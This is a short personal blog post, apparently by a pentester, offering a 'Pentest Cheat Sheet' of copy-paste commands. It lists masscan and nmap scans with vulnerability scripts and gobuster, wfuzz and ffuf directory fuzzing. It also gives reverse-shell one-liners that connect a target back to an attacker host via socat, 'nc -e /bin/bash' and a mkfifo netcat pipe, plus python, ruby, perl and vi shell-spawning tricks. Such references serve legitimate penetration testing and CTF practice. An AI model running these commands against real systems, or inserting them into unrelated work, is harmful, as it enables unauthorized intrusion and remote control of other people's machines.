bt0

Blogging about InfoSec

9 January 2020

Pentest Cheat Sheet

by bt0

tags: infosec - pentest - recipes

Uma reunião de alguns comandos que uso com frequência (para referência e CTRL+C / CTRL+V).

Port Scanning

- masscan -e tun1 -p1-65535,U:1-65535 10.10.10.1 --rate=500
    
- nmap -e tun1 -n -v -Pn -p22,80 -A --reason -oN nmap.txt 10.10.10.1
- nmap -sSV --version-all --min-parallelism 64 --script=vuln 10.10.10.1 -Pn -n
- nmap -sV -sC -sT 10.10.10.1
- nmap -sV --script *vuln* -p- 10.10.10.1

Some Fuzzing Things

Gobuster

- gobuster dir -w some-wordlist.txt -x php -e -u http://10.10.10.1/ --timeout 30s

wfuzz

- wfuzz -w some-wordlist.txt --hc '403,404' http://10.10.10.1/FUZZ
- wfuzz -c -z file,wordlist.txt -z file,wordlist2.txt --hc 404 http://10.10.10.1:8080/FUZZ/FUZ2Z

ffuf <==== Faster!!!!!

- ffuf -c -w some-wordlist.txt -u http://10.10.10.1/subdir/FUZZ

Reverse Shell

Socat

On Attacker: socat file:`tty`,raw,echo=0 tcp-listen:4445
On Target:   socat tcp-connect:10.10.15.1:4445 exec:sh,pty,stderr,setsid,sigint,sane

Netcat (w/ e)

On Attacker:    nc/netcat -l -n -v -p 4445
On Target:      nc/netcat -e /bin/bash <attacker_IP> <Attacker_Port>

Netcat (w/o e)

On Attacker:    nc/netcat -l -n -v -p 4445
On Target:      rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc/netcat 10.0.0.1 4445 > /tmp/f

Spanwning Shell

Python

- python -c 'import pty; pty.spawn("/bin/bash")'

Ruby

- ruby: exec "/bin/sh"

Perl

- perl —e 'exec "/bin/sh";'
- perl: exec "/bin/sh";

From vi or vim

- :!bash
- :!/bin/bash